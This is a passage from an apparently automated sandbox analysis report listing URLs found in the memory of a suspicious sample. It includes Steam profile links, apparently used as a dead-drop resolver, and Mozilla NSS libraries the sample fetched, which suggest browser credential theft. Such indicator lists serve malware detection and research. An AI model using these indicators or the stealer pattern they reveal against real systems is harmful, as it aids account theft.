Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: HCFIII.9.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000884000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000086F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/c
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/ho
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/m
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: kat796E.tmp, 00000009.00000003.2410519110.000000000086F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899$
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899r0isMozilla/5.0
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899tS
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000884000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000086F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/s
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
